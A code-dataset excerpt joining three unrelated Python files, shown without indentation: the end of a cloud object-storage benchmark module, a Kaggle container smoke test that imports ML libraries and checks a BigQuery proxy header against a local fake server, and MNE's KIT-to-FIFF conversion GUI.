if age_hours and age_hours > FLAGS.object_storage_read_objects_min_hours:
read_objects_filename = filename
break
else:
raise ColdDataError(
'Object data older than %d hours does not exist. Current cold data '
'files include the following: %s' % (
FLAGS.object_storage_read_objects_min_hours,
read_objects_filenames))
with open(read_objects_filename) as read_objects_file:
# Format of json structure is:
# {"bucket_name": <bucket_name>,
# ... any other provider-specific context needed
# "objects_written": <objects_written_array>}
benchmark_spec.read_objects = json.loads(read_objects_file.read())
benchmark_spec.read_objects_filename = read_objects_filename
benchmark_spec.read_objects_age_hours = age_hours
# When this benchmark reads these files, the data will be deleted. Delete
# the file that specifies the data too.
if not FLAGS.object_storage_dont_delete_bucket:
os.remove(read_objects_filename)
assert benchmark_spec.read_objects is not None, (
'Failed to read the file specified by '
'--object_storage_read_objects_prefix')
# Load the provider and its object storage service
providers.LoadProvider(FLAGS.storage)
# Determine the bucket name.
if benchmark_spec.read_objects is not None:
# Using an existing bucket
bucket_name = benchmark_spec.read_objects['bucket_name']
if FLAGS.object_storage_bucket_name is not None:
logging.warning('--object_storage_bucket_name ignored because '
'--object_storage_read_objects was specified')
else:
# Use a new bucket (or the name of a specified bucket).
bucket_name = FLAGS.object_storage_bucket_name or 'pkb%s' % FLAGS.run_uri
if FLAGS.object_storage_apply_region_suffix_to_bucket_name:
# Avoid non-alphanumeric characters in the region as bucket names on some
# clouds cannot contain non-alphanumeric characters.
bucket_name = '%s%s' % (bucket_name,
re.sub(r'[\W_]', '', FLAGS.object_storage_region))
service = object_storage_service.GetObjectStorageClass(FLAGS.storage)()
if (FLAGS.storage == 'Azure' and
FLAGS.object_storage_read_objects_prefix is not None):
# Storage provider is azure and we are reading existing objects.
# Need to prepare the ObjectStorageService with the existing storage
# account and resource group associated with the bucket containing our
# objects
service.PrepareService(
FLAGS.object_storage_region,
# On Azure, use an existing storage account if we
# are reading existing objects
(benchmark_spec.read_objects['azure_storage_account'],
benchmark_spec.read_objects['azure_resource_group']))
elif FLAGS.storage == 'Azure' and FLAGS.object_storage_bucket_name:
# We are using a bucket that may exist from a previous run. We should use
# a storage account and resource group for this bucket based on the same
# name (for consistency).
service.PrepareService(
FLAGS.object_storage_region,
# The storage account must not exceed 24 characters.
(bucket_name[:24], bucket_name + '-resource-group'),
try_to_create_storage_account_and_resource_group=True)
else:
service.PrepareService(FLAGS.object_storage_region)
vms = benchmark_spec.vms
vm_util.RunThreaded(lambda vm: PrepareVM(vm, service), vms)
# Make the bucket.
if benchmark_spec.read_objects is None:
# Fail if we cannot create the bucket as long as the bucket name was not
# set via a flag. If it was set by a flag, then we will still try to create
# the bucket, but won't fail if it was created. This supports running the
# benchmark on the same bucket multiple times.
raise_on_bucket_creation_failure = not FLAGS.object_storage_bucket_name
if FLAGS.storage == 'GCP' and FLAGS.object_storage_gcs_multiregion:
# Use a GCS multiregional bucket
multiregional_service = gcs.GoogleCloudStorageService()
multiregional_service.PrepareService(FLAGS.object_storage_gcs_multiregion
or DEFAULT_GCS_MULTIREGION)
multiregional_service.MakeBucket(
bucket_name, raise_on_failure=raise_on_bucket_creation_failure)
else:
# Use a regular bucket
service.MakeBucket(
bucket_name, raise_on_failure=raise_on_bucket_creation_failure)
# Save the service and the bucket name for later
benchmark_spec.service = service
benchmark_spec.bucket_name = bucket_name
def Run(benchmark_spec):
"""Run storage benchmark and publish results.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
Returns:
Total throughput in the form of tuple. The tuple contains
the sample metric (string), value (float), unit (string).
"""
logging.info('Start benchmarking object storage service, '
'scenario is %s, storage provider is %s.',
FLAGS.object_storage_scenario, FLAGS.storage)
service = benchmark_spec.service
bucket_name = benchmark_spec.bucket_name
metadata = {'storage_provider': FLAGS.storage}
vms = benchmark_spec.vms
if FLAGS[OBJECT_STORAGE_REGION].present:
metadata[REGIONAL_BUCKET_LOCATION] = FLAGS.object_storage_region
else:
metadata[REGIONAL_BUCKET_LOCATION] = DEFAULT
if FLAGS[OBJECT_STORAGE_GCS_MULTIREGION].present:
metadata[GCS_MULTIREGION_LOCATION] = FLAGS.object_storage_gcs_multiregion
else:
metadata[GCS_MULTIREGION_LOCATION] = DEFAULT
metadata.update(service.Metadata(vms[0]))
results = []
test_script_path = '/tmp/run/%s' % API_TEST_SCRIPT
try:
command_builder = APIScriptCommandBuilder(
test_script_path, STORAGE_TO_API_SCRIPT_DICT[FLAGS.storage], service)
except KeyError:
command_builder = UnsupportedProviderCommandBuilder(FLAGS.storage)
for name, benchmark in [('cli', CLIThroughputBenchmark),
('api_data', OneByteRWBenchmark),
('api_data', SingleStreamThroughputBenchmark),
('api_namespace', ListConsistencyBenchmark)]:
if FLAGS.object_storage_scenario in {name, 'all'}:
benchmark(results, metadata, vms[0], command_builder,
service, bucket_name)
# MultiStreamRW and MultiStreamWrite support multiple VMs, so they have a
# slightly different calling convention than the others.
for name, benchmark in [('api_multistream', MultiStreamRWBenchmark),
('api_multistream_writes',
MultiStreamWriteBenchmark)]:
if FLAGS.object_storage_scenario in {name, 'all'}:
benchmark(results, metadata, vms, command_builder, service, bucket_name)
# MultiStreamRead has the additional 'read_objects' parameter
if FLAGS.object_storage_scenario in {'api_multistream_reads', 'all'}:
metadata['cold_objects_filename'] = benchmark_spec.read_objects_filename
metadata['cold_objects_age_hours'] = benchmark_spec.read_objects_age_hours
MultiStreamReadBenchmark(results, metadata, vms, command_builder, service,
bucket_name,
benchmark_spec.read_objects['objects_written'])
# Clear the bucket if we're not saving the objects for later
# This is needed for long running tests, or else the objects would just pile
# up after each run.
keep_bucket = (FLAGS.object_storage_objects_written_file_prefix is not None or
FLAGS.object_storage_dont_delete_bucket)
if not keep_bucket:
service.EmptyBucket(bucket_name)
return results
def Cleanup(benchmark_spec):
"""Clean up storage bucket/container and clean up vm.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
"""
service = benchmark_spec.service
bucket_name = benchmark_spec.bucket_name
vms = benchmark_spec.vms
vm_util.RunThreaded(lambda vm: CleanupVM(vm, service), vms)
# Only clean up bucket if we're not saving the objects for a later run
keep_bucket = (FLAGS.object_storage_objects_written_file_prefix is not None or
FLAGS.object_storage_dont_delete_bucket)
if not keep_bucket:
service.DeleteBucket(bucket_name)
service.CleanupService()
|
test_build.py
|
# This script should run without errors whenever we update the
# kaggle/python container. It checks that all our most popular packages can
# be loaded and used without errors.
import tensorflow as tf
print(tf.__version__)
hello = tf.constant('TensorFlow ok')
sess = tf.Session()
print(sess.run(hello))
print("Tensorflow ok")
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.optimizers import SGD
print("Keras ok")
# Test Kaggle learntools
from learntools.core import binder; binder.bind(globals())
from learntools.python.ex1 import *
color="blue"
q0.check()
print("learntools ok")
# PyTorch smoke test based on http://pytorch.org/tutorials/beginner/nlp/deep_learning_tutorial.html
import torch
import torch.nn as tnn
import torch.autograd as autograd
torch.manual_seed(31337)
linear_torch = tnn.Linear(5,3)
data_torch = autograd.Variable(torch.randn(2, 5))
print(linear_torch(data_torch))
print("PyTorch ok")
import fastai
from fastai.io import get_data
print("fast.ai ok")
import numpy as np
print("Numpy imported ok")
print("Your lucky number is: " + str(np.random.randint(100)))
# Numpy must be linked to the MKL. (Occasionally, a third-party package will muck up the installation
# and numpy will be reinstalled with an OpenBLAS backing.)
from numpy.distutils.system_info import get_info
# This will throw an exception if the MKL is not linked correctly.
get_info("blas_mkl")
import pandas as pd
print("Pandas imported ok")
from sklearn import datasets
print("sklearn imported ok")
iris = datasets.load_iris()
X, y = iris.data, iris.target
from sklearn.ensemble import RandomForestClassifier
rf1 = RandomForestClassifier()
rf1.fit(X,y)
print("sklearn RandomForestClassifier: ok")
from sklearn.linear_model import LinearRegression
boston = datasets.load_boston()
X, y = boston.data, boston.target
lr1 = LinearRegression()
lr1.fit(X,y)
print("sklearn LinearRegression: ok")
from xgboost import XGBClassifier
xgb1 = XGBClassifier(n_estimators=3)
xgb1.fit(X[0:70],y[0:70])
print("xgboost XGBClassifier: ok")
import matplotlib.pyplot as plt
plt.plot(np.linspace(0,1,50), np.random.rand(50))
plt.savefig("plot1.png")
print("matplotlib.pyplot ok")
from mpl_toolkits.basemap import Basemap
print("Basemap ok")
import plotly.plotly as py
import plotly.graph_objs as go
print("plotly ok")
import theano
print("Theano ok")
import nltk
from nltk.stem import WordNetLemmatizer
print("nltk ok")
import cv2
img = cv2.imread('plot1.png',0)
print("OpenCV ok")
from skimage.io import imread
print("skimage ok")
from wordbatch.extractors import WordBag
print("wordbatch ok")
import pyfasttext
print("pyfasttext ok")
import fastText
print("fastText ok")
import mxnet
import mxnet.gluon
print("mxnet ok")
import bokeh
print("bokeh ok")
import seaborn
print("seaborn ok")
# Test BigQuery
import os
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from google.cloud import bigquery
HOSTNAME = "127.0.0.1"
PORT = 8000
URL = "http://%s:%s" % (HOSTNAME, PORT)
fake_bq_called = False
fake_bq_header_found = False
class HTTPHandler(BaseHTTPRequestHandler):
def do_HEAD(s):
s.send_response(200)
def do_GET(s):
global fake_bq_called
global fake_bq_header_found
fake_bq_called = True
fake_bq_header_found = any(k for k in s.headers if k == "X-KAGGLE-PROXY-DATA" and s.headers[k] == "test-key")
s.send_response(200)
httpd = HTTPServer((HOSTNAME, PORT), HTTPHandler)
threading.Thread(target=httpd.serve_forever).start()
client = bigquery.Client()
try:
for ds in client.list_datasets(): pass
except:
pass
httpd.shutdown()
assert fake_bq_called, "Fake server did not recieve a request from the BQ client."
assert fake_bq_header_found, "X-KAGGLE-PROXY-DATA header was missing from the BQ request."
print("bigquery proxy ok")
import shap
print("shap ok")
import kmapper
print("kmapper ok")
from vowpalwabbit import pyvw
vw = pyvw.vw(quiet=True)
ex = vw.example('1 | a b c')
vw.learn(ex)
print(vw.predict(ex))
print('vowpalwabbit ok')
import essentia
print(essentia.__version__)
print("Essentia ok")
|
_kit2fiff_gui.py
|
"""Mayavi/traits GUI for converting data from KIT systems."""
# Authors: Christian Brodbeck <christianbrodbeck@nyu.edu>
#
# License: BSD (3-clause)
from collections import Counter
import os
import queue
import sys
import numpy as np
from scipy.linalg import inv
from threading import Thread
from mayavi.core.ui.mayavi_scene import MayaviScene
from mayavi.tools.mlab_scene_model import MlabSceneModel
from pyface.api import (confirm, error, FileDialog, OK, YES, information,
ProgressDialog, warning)
from traits.api import (HasTraits, HasPrivateTraits, cached_property, Instance,
Property, Bool, Button, Enum, File, Float, Int, List,
Str, Array, DelegatesTo, on_trait_change)
from traits.trait_base import ETSConfig
from traitsui.api import (View, Item, HGroup, VGroup, spring, TextEditor,
CheckListEditor, EnumEditor, Handler)
from traitsui.menu import NoButtons
from tvtk.pyface.scene_editor import SceneEditor
from ..io.constants import FIFF
from ..io._digitization import _read_dig_points, _make_dig_points
from ..io.kit.kit import (RawKIT, KIT, _make_stim_channel, _default_stim_chs,
UnsupportedKITFormat)
from ..transforms import (apply_trans, als_ras_trans,
get_ras_to_neuromag_trans, Transform)
from ..coreg import _decimate_points, fit_matched_points
from ..utils import get_config, set_config, logger, warn
from ._backend import _check_pyface_backend
from ..event import _find_events
from ._marker_gui import CombineMarkersPanel, CombineMarkersModel
from ._help import read_tooltips
from ._viewer import HeadViewController, PointObject
use_editor = CheckListEditor(cols=5, values=[(i, str(i)) for i in range(5)])
if _check_pyface_backend()[0] == 'wx':
# wx backend allows labels for wildcards
hsp_wildcard = ['Head Shape Points (*.hsp;*.txt)|*.hsp;*.txt']
elp_wildcard = ['Head Shape Fiducials (*.elp;*.txt)|*.elp;*.txt']
kit_con_wildcard = ['Continuous KIT Files (*.sqd;*.con)|*.sqd;*.con']
if sys.platform in ('win32', 'linux2'):
# on Windows and Ubuntu, multiple wildcards does not seem to work
hsp_wildcard = ['*.hsp', '*.txt']
elp_wildcard = ['*.elp', '*.txt']
kit_con_wildcard = ['*.sqd', '*.con']
else:
hsp_wildcard = ['*.hsp;*.txt']
elp_wildcard = ['*.elp;*.txt']
kit_con_wildcard = ['*.sqd;*.con']
tooltips = read_tooltips('kit2fiff')
class Kit2FiffModel(HasPrivateTraits):
"""Data Model for Kit2Fiff conversion.
- Markers are transformed into RAS coordinate system (as are the sensor
coordinates).
- Head shape digitizer data is transformed into neuromag-like space.
"""
# Input Traits
markers = Instance(CombineMarkersModel, ())
sqd_file = File(exists=True, filter=kit_con_wildcard)
allow_unknown_format = Bool(False)
hsp_file = File(exists=True, filter=hsp_wildcard)
fid_file = File(exists=True, filter=elp_wildcard)
stim_coding = Enum(">", "<", "channel")
stim_chs = Str("")
stim_chs_array = Property(depends_on=['raw', 'stim_chs', 'stim_coding'])
stim_chs_ok = Property(depends_on='stim_chs_array')
stim_chs_comment = Property(depends_on='stim_chs_array')
stim_slope = Enum("-", "+")
stim_threshold = Float(1.)
# Marker Points
use_mrk = List(list(range(5)), desc="Which marker points to use for the "
"device head coregistration.")
# Derived Traits
mrk = Property(depends_on='markers.mrk3.points')
# Polhemus Fiducials
elp_raw = Property(depends_on=['fid_file'])
hsp_raw = Property(depends_on=['hsp_file'])
polhemus_neuromag_trans = Property(depends_on=['elp_raw'])
# Polhemus data (in neuromag space)
elp = Property(depends_on=['elp_raw', 'polhemus_neuromag_trans'])
fid = Property(depends_on=['elp_raw', 'polhemus_neuromag_trans'])
hsp = Property(depends_on=['hsp_raw', 'polhemus_neuromag_trans'])
# trans
dev_head_trans = Property(depends_on=['elp', 'mrk', 'use_mrk'])
head_dev_trans = Property(depends_on=['dev_head_trans'])
# event preview
raw = Property(depends_on='sqd_file')
misc_chs = Property(List, depends_on='raw')
misc_chs_desc = Property(Str, depends_on='misc_chs')
misc_data = Property(Array, depends_on='raw')
can_test_stim = Property(Bool, depends_on='raw')
# info
sqd_fname = Property(Str, depends_on='sqd_file')
hsp_fname = Property(Str, depends_on='hsp_file')
fid_fname = Property(Str, depends_on='fid_file')
can_save = Property(Bool, depends_on=['stim_chs_ok', 'fid',
'elp', 'hsp', 'dev_head_trans'])
# Show GUI feedback (like error messages and progress bar)
show_gui = Bool(False)
@cached_property
def _get_can_save(self):
"""Only allow saving when all or no head shape elements are set."""
if not self.stim_chs_ok:
return False
has_all_hsp = (np.any(self.dev_head_trans) and np.any(self.hsp) and
np.any(self.elp) and np.any(self.fid))
if has_all_hsp:
return True
has_any_hsp = self.hsp_file or self.fid_file or np.any(self.mrk)
return not has_any_hsp
@cached_property
def _get_can_test_stim(self):
return self.raw is not None
@cached_property
def _get_dev_head_trans(self):
if (self.mrk is None) or not np.any(self.fid):
return np.eye(4)
src_pts = self.mrk
dst_pts = self.elp
n_use = len(self.use_mrk)
if n_use < 3:
if self.show_gui:
error(None, "Estimating the device head transform requires at "
"least 3 marker points. Please adjust the markers used.",
"Not Enough Marker Points")
return
elif n_use < 5:
src_pts = src_pts[self.use_mrk]
dst_pts = dst_pts[self.use_mrk]
trans = fit_matched_points(src_pts, dst_pts, out='trans')
return trans
@cached_property
def _get_elp(self):
if self.elp_raw is None:
return np.empty((0, 3))
pts = self.elp_raw[3:8]
pts = apply_trans(self.polhemus_neuromag_trans, pts)
return pts
@cached_property
def _get_elp_raw(self):
if not self.fid_file:
return
try:
pts = _read_dig_points(self.fid_file)
if len(pts) < 8:
raise ValueError("File contains %i points, need 8" % len(pts))
except Exception as err:
if self.show_gui:
error(None, str(err), "Error Reading Fiducials")
self.reset_traits(['fid_file'])
raise
else:
return pts
@cached_property
def _get_fid(self):
if self.elp_raw is None:
return np.empty((0, 3))
pts = self.elp_raw[:3]
pts = apply_trans(self.polhemus_neuromag_trans, pts)
return pts
@cached_property
def _get_fid_fname(self):
if self.fid_file:
return os.path.basename(self.fid_file)
else:
return '-'
@cached_property
def _get_head_dev_trans(self):
return inv(self.dev_head_trans)
@cached_property
def _get_hsp(self):
if (self.hsp_raw is None) or not np.any(self.polhemus_neuromag_trans):
return np.empty((0, 3))
else:
pts = apply_trans(self.polhemus_neuromag_trans, self.hsp_raw)
return pts
@cached_property
def _get_hsp_fname(self):
if self.hsp_file:
return os.path.basename(self.hsp_file)
else:
return '-'
@cached_property
def _get_hsp_raw(self):
fname = self.hsp_file
if not fname:
return
try:
pts = _read_dig_points(fname)
n_pts = len(pts)
if n_pts > KIT.DIG_POINTS:
msg = ("The selected head shape contains {n_in} points, "
"which is more than the recommended maximum ({n_rec}). "
"The file will be automatically downsampled, which "
"might take a while. A better way to downsample is "
"using FastScan.".
format(n_in=n_pts, n_rec=KIT.DIG_POINTS))
if self.show_gui:
information(None, msg, "Too Many Head Shape Points")
pts = _decimate_points(pts, 5)
except Exception as err:
if self.show_gui:
error(None, str(err), "Error Reading Head Shape")
self.reset_traits(['hsp_file'])
raise
else:
return pts
@cached_property
def _get_misc_chs(self):
if not self.raw:
return
return [i for i, ch in enumerate(self.raw.info['chs']) if
ch['kind'] == FIFF.FIFFV_MISC_CH]
@cached_property
def _get_misc_chs_desc(self):
if self.misc_chs is None:
return "No SQD file selected..."
elif np.all(np.diff(self.misc_chs) == 1):
return "%i:%i" % (self.misc_chs[0], self.misc_chs[-1] + 1)
else:
return "%i... (discontinuous)" % self.misc_chs[0]
@cached_property
def _get_misc_data(self):
if not self.raw:
return
if self.show_gui:
# progress dialog with indefinite progress bar
prog = ProgressDialog(title="Loading SQD data...",
message="Loading stim channel data from SQD "
"file ...")
prog.open()
prog.update(0)
else:
prog = None
try:
data, times = self.raw[self.misc_chs]
except Exception as err:
if self.show_gui:
error(None, "Error reading SQD data file: %s (Check the "
"terminal output for details)" % str(err),
"Error Reading SQD File")
raise
finally:
if self.show_gui:
prog.close()
return data
@cached_property
def _get_mrk(self):
return apply_trans(als_ras_trans, self.markers.mrk3.points)
@cached_property
def _get_polhemus_neuromag_trans(self):
if self.elp_raw is None:
return
nasion, lpa, rpa = apply_trans(als_ras_trans, self.elp_raw[:3])
trans = get_ras_to_neuromag_trans(nasion, lpa, rpa)
return np.dot(trans, als_ras_trans)
@cached_property
def _get_raw(self):
if not self.sqd_file:
return
try:
return RawKIT(self.sqd_file, stim=None,
allow_unknown_format=self.allow_unknown_format)
except UnsupportedKITFormat as exception:
warning(
None,
"The selected SQD file is written in an old file format (%s) "
"that is not officially supported. Confirm that the results "
"are as expected. This warning is displayed only once per "
"session." % (exception.sqd_version,),
"Unsupported SQD File Format")
self.allow_unknown_format = True
return self._get_raw()
except Exception as err:
self.reset_traits(['sqd_file'])
if self.show_gui:
error(None, "Error reading SQD data file: %s (Check the "
"terminal output for details)" % str(err),
"Error Reading SQD File")
raise
@cached_property
def _get_sqd_fname(self):
if self.sqd_file:
return os.path.basename(self.sqd_file)
else:
return '-'
@cached_property
def _get_stim_chs_array(self):
if self.raw is None:
return
elif not self.stim_chs.strip():
picks = _default_stim_chs(self.raw.info)
else:
try:
picks = eval("r_[%s]" % self.stim_chs, vars(np))
if picks.dtype.kind != 'i':
raise TypeError("Need array of int")
except Exception:
return None
if self.stim_coding == '<': # Big-endian
return picks[::-1]
else:
return picks
@cached_property
def _get_stim_chs_comment(self):
if self.raw is None:
return ""
elif not self.stim_chs_ok:
return "Invalid!"
elif not self.stim_chs.strip():
return "Default: The first 8 MISC channels"
else:
return "Ok: %i channels" % len(self.stim_chs_array)
@cached_property
def _get_stim_chs_ok(self):
return self.stim_chs_array is not None
def clear_all(self):
"""Clear all specified input parameters."""
self.markers.clear = True
self.reset_traits(['sqd_file', 'hsp_file', 'fid_file', 'use_mrk'])
def get_event_info(self):
"""Count events with current stim channel settings.
Returns
-------
event_count : Counter
Counter mapping event ID to number of occurrences.
"""
if self.misc_data is None:
return
idx = [self.misc_chs.index(ch) for ch in self.stim_chs_array]
data = self.misc_data[idx]
if self.stim_coding == 'channel':
coding = 'channel'
else:
coding = 'binary'
stim_ch = _make_stim_channel(data, self.stim_slope,
self.stim_threshold, coding,
self.stim_chs_array)
events = _find_events(stim_ch, self.raw.first_samp, consecutive=True,
min_samples=3)
return Counter(events[:, 2])
def get_raw(self, preload=False):
"""Create a raw object based on the current model settings."""
if not self.can_save:
raise ValueError("Not all necessary parameters are set")
# stim channels and coding
if self.stim_coding == 'channel':
stim_code = 'channel'
elif self.stim_coding in '<>':
stim_code = 'binary'
else:
raise RuntimeError("stim_coding=%r" % self.stim_coding)
logger.info("Creating raw with stim=%r, slope=%r, stim_code=%r, "
"stimthresh=%r", self.stim_chs_array, self.stim_slope,
stim_code, self.stim_threshold)
raw = RawKIT(self.sqd_file, preload=preload, stim=self.stim_chs_array,
slope=self.stim_slope, stim_code=stim_code,
stimthresh=self.stim_threshold,
allow_unknown_format=self.allow_unknown_format)
if np.any(self.fid):
raw.info['dig'] = _make_dig_points(self.fid[0], self.fid[1],
self.fid[2], self.elp,
self.hsp)
raw.info['dev_head_t'] = Transform('meg', 'head',
self.dev_head_trans)
return raw
class Kit2FiffFrameHandler(Handler):
"""Check for unfinished processes before closing its window."""
def close(self, info, is_ok): # noqa: D102
if info.object.kit2fiff_panel.queue.unfinished_tasks:
msg = ("Can not close the window while saving is still in "
"progress. Please wait until all files are processed.")
title = "Saving Still in Progress"
information(None, msg, title)
return False
else:
# store configuration, but don't prevent from closing on error
try:
info.object.save_config()
except Exception as exc:
warn("Error saving GUI configuration:\n%s" % (exc,))
return True
class Kit2FiffPanel(HasPrivateTraits):
"""Control panel for kit2fiff conversion."""
model = Instance(Kit2FiffModel)
# model copies for view
use_mrk = DelegatesTo('model')
sqd_file = DelegatesTo('model')
hsp_file = DelegatesTo('model')
fid_file = DelegatesTo('model')
stim_coding = DelegatesTo('model')
stim_chs = DelegatesTo('model')
stim_chs_ok = DelegatesTo('model')
stim_chs_comment = DelegatesTo('model')
stim_slope = DelegatesTo('model')
stim_threshold = DelegatesTo('model')
# info
can_save = DelegatesTo('model')
sqd_fname = DelegatesTo('model')
hsp_fname = DelegatesTo('model')
fid_fname = DelegatesTo('model')
misc_chs_desc = DelegatesTo('model')
can_test_stim = DelegatesTo('model')
test_stim = Button(label="Find Events")
plot_raw = Button(label="Plot Raw")
# Source Files
reset_dig = Button
# Visualization
scene = Instance(MlabSceneModel)
fid_obj = Instance(PointObject)
elp_obj = Instance(PointObject)
hsp_obj = Instance(PointObject)
# Output
save_as = Button(label='Save FIFF...')
clear_all = Button(label='Clear All')
queue = Instance(queue.Queue, ())
queue_feedback = Str('')
queue_current = Str('')
queue_len = Int(0)
queue_len_str = Property(Str, depends_on=['queue_len'])
error = Str('')
view = View(
VGroup(VGroup(Item('sqd_file', label="Data",
tooltip=tooltips['sqd_file']),
Item('sqd_fname', show_label=False, style='readonly'),
Item('hsp_file', label='Digitizer\nHead Shape',
tooltip=tooltips['hsp_file']),
Item('hsp_fname', show_label=False, style='readonly'),
Item('fid_file', label='Digitizer\nFiducials',
tooltip=tooltips['fid_file']),
Item('fid_fname', show_label=False, style='readonly'),
Item('reset_dig', label='Clear Digitizer Files',
show_label=False),
Item('use_mrk', editor=use_editor, style='custom',
tooltip=tooltips['use_mrk']),
label="Sources", show_border=True),
VGroup(Item('misc_chs_desc', label='MISC Channels',
style='readonly'),
Item('stim_slope', label="Event Onset", style='custom',
tooltip=tooltips['stim_slope'],
editor=EnumEditor(
values={'+': '2:Peak (0 to 5 V)',
'-': '1:Trough (5 to 0 V)'},
cols=2)),
Item('stim_coding', label="Value Coding", style='custom',
editor=EnumEditor(values={'>': '1:little-endian',
'<': '2:big-endian',
'channel': '3:Channel#'},
cols=3),
tooltip=tooltips["stim_coding"]),
Item('stim_chs', label='Channels', style='custom',
tooltip=tooltips["stim_chs"],
editor=TextEditor(evaluate_name='stim_chs_ok',
auto_set=True)),
Item('stim_chs_comment', label='Evaluation',
style='readonly', show_label=False),
Item('stim_threshold', label='Threshold',
tooltip=tooltips['stim_threshold']),
HGroup(Item('test_stim', enabled_when='can_test_stim',
show_label=False),
Item('plot_raw', enabled_when='can_test_stim',
show_label=False),
show_labels=False),
label='Events', show_border=True),
HGroup(Item('save_as', enabled_when='can_save'), spring,
'clear_all', show_labels=False),
Item('queue_feedback', show_label=False, style='readonly'),
Item('queue_current', show_label=False, style='readonly'),
Item('queue_len_str', show_label=False, style='readonly')
)
)
def __init__(self, *args, **kwargs): # noqa: D102
super(Kit2FiffPanel, self).__init__(*args, **kwargs)
# setup save worker
def worker(): # noqa: D102
while True:
raw, fname = self.queue.get()
basename = os.path.basename(fname)
self.queue_len -= 1
self.queue_current = 'Processing: %s' % basename
# task
try:
raw.save(fname, overwrite=True)
except Exception as err:
self.error = str(err)
res = "Error saving: %s"
else:
res = "Saved: %s"
# finalize
self.queue_current = ''
self.queue_feedback = res % basename
self.queue.task_done()
t = Thread(target=worker)
t.daemon = True
t.start()
# setup mayavi visualization
self.fid_obj = PointObject(scene=self.scene, color=(0.1, 1., 0.1),
point_scale=5e-3, name='Fiducials')
self._update_fid()
self.elp_obj = PointObject(scene=self.scene,
color=(0.196, 0.196, 0.863),
point_scale=1e-2, opacity=.2, name='ELP')
self._update_elp()
self.hsp_obj = PointObject(scene=self.scene, color=(0.784,) * 3,
point_scale=2e-3, name='HSP')
self._update_hsp()
self.scene.camera.parallel_scale = 0.15
self.scene.mlab.view(0, 0, .15)
@on_trait_change('model:fid,model:head_dev_trans')
def _update_fid(self):
if self.fid_obj is not None:
self.fid_obj.points = apply_trans(self.model.head_dev_trans,
self.model.fid)
@on_trait_change('model:hsp,model:head_dev_trans')
def _update_hsp(self):
if self.hsp_obj is not None:
self.hsp_obj.points = apply_trans(self.model.head_dev_trans,
self.model.hsp)
@on_trait_change('model:elp,model:head_dev_trans')
def _update_elp(self):
if self.elp_obj is not None:
self.elp_obj.points = apply_trans(self.model.head_dev_trans,
self.model.elp)
def _clear_all_fired(self):
self.model.clear_all()
@cached_property
def _get_queue_len_str(self):
if self.queue_len:
return "Queue length: %i" % self.queue_len
else:
return ''
def _plot_raw_fired(self):
self.model.raw.plot()
def _reset_dig_fired(self):
self.reset_traits(['hsp_file', 'fid_file'])
def _save_as_fired(self):
# create raw
try:
raw = self.model.get_raw()
except Exception as err:
error(None, str(err), "Error Creating KIT Raw")
raise
# find default path
stem, _ = os.path.splitext(self.sqd_file)
if not stem.endswith('raw'):
stem += '-raw'
default_path = stem + '.fif'
# save as dialog
dlg = FileDialog(action="save as",
wildcard="fiff raw file (*.fif)|*.fif",
default_path=default_path)
dlg.open()
if dlg.return_code != OK:
return
fname = dlg.path
if not fname.endswith('.fif'):
fname += '.fif'
if os.path.exists(fname):
answer = confirm(None, "The file %r already exists. Should it "
"be replaced?", "Overwrite File?")
if answer != YES:
return
self.queue.put((raw, fname))
self.queue_len += 1
def _test_stim_fired(self):
try:
events = self.model.get_event_info()
except Exception as err:
error(None, "Error reading events from SQD data file: %s (Check "
"the terminal output for details)" % str(err),
"Error Reading events from SQD file")
raise
if len(events) == 0:
information(None, "No events were found with the current "
"settings.", "No Events Found")
else:
lines = ["Events found (ID: n events):"]
for id_ in sorted(events):
lines.append("%3i: \t%i" % (id_, events[id_]))
information(None, '\n'.join(lines), "Events in SQD File")
class Kit2FiffFrame(HasTraits):
"""GUI for interpolating between two KIT marker files."""
model = Instance(Kit2FiffModel)
scene = Instance(MlabSceneModel, ())
headview = Instance(HeadViewController)
marker_panel = Instance(CombineMarkersPanel)
kit2fiff_panel = Instance(Kit2FiffPanel)
view = View(HGroup(VGroup(Item('marker_panel', style='custom'),
show_labels=False),
VGroup(Item('scene',
editor=SceneEditor(scene_class=MayaviScene),
dock='vertical', show_label=False),
VGroup(Item('headview', style='custom'),
show_labels=False),
),
VGroup(Item('kit2fiff_panel', style='custom'),
show_labels=False),
show_labels=False,
),
handler=Kit2FiffFrameHandler(),
height=700, resizable=True, buttons=NoButtons)
def __init__(self, *args, **kwargs): # noqa: D102
logger.debug(
"Initializing Kit2fiff-GUI with %s backend", ETSConfig.toolkit)
HasTraits.__init__(self, *args, **kwargs)
# can't be static method due to Traits
def _model_default(self):
# load configuration values and make sure they're valid
config = get_config(home_dir=os.environ.get('_MNE_FAKE_HOME_DIR'))
stim_threshold = 1.
if 'MNE_KIT2FIFF_STIM_CHANNEL_THRESHOLD' in config:
try:
stim_threshold = float(
config['MNE_KIT2FIFF_STIM_CHANNEL_THRESHOLD'])
except ValueError:
warn("Ignoring invalid configuration value for "
"MNE_KIT2FIFF_STIM_CHANNEL_THRESHOLD: %r (expected "
"float)" %
(config['MNE_KIT2FIFF_STIM_CHANNEL_THRESHOLD'],))
stim_slope = config.get('MNE_KIT2FIFF_STIM_CHANNEL_SLOPE', '-')
if stim_slope not in '+-':
warn("Ignoring invalid configuration value for "
"MNE_KIT2FIFF_STIM_CHANNEL_THRESHOLD: %s (expected + or -)" %
stim_slope)
stim_slope = '-'
stim_coding = config.get('MNE_KIT2FIFF_STIM_CHANNEL_CODING', '>')
if stim_coding not in ('<', '>', 'channel'):
warn("Ignoring invalid configuration value for "
"MNE_KIT2FIFF_STIM_CHANNEL_CODING: %s (expected <, > or "
"channel)" % stim_coding)
stim_coding = '>'
return Kit2FiffModel(
stim_chs=config.get('MNE_KIT2FIFF_STIM_CHANNELS', ''),
stim_coding=stim_coding,
stim_slope=stim_slope,
stim_threshold=stim_threshold,
show_gui=True)
def _headview_default(self):
return HeadViewController(scene=self.scene, scale=160, system='RAS')
def _kit2fiff_panel_default(self):
return Kit2FiffPanel(scene=self.scene, model=self.model)
def _marker_panel_default(self):
return CombineMarkersPanel(scene=self.scene, model=self.model.markers,
trans=als_ras_trans)
def save_config(self, home_dir=None):
"""Write configuration values."""
set_config('MNE_KIT2FIFF_STIM_CHANNELS', self.model.stim_chs, home_dir,
set_env=False)
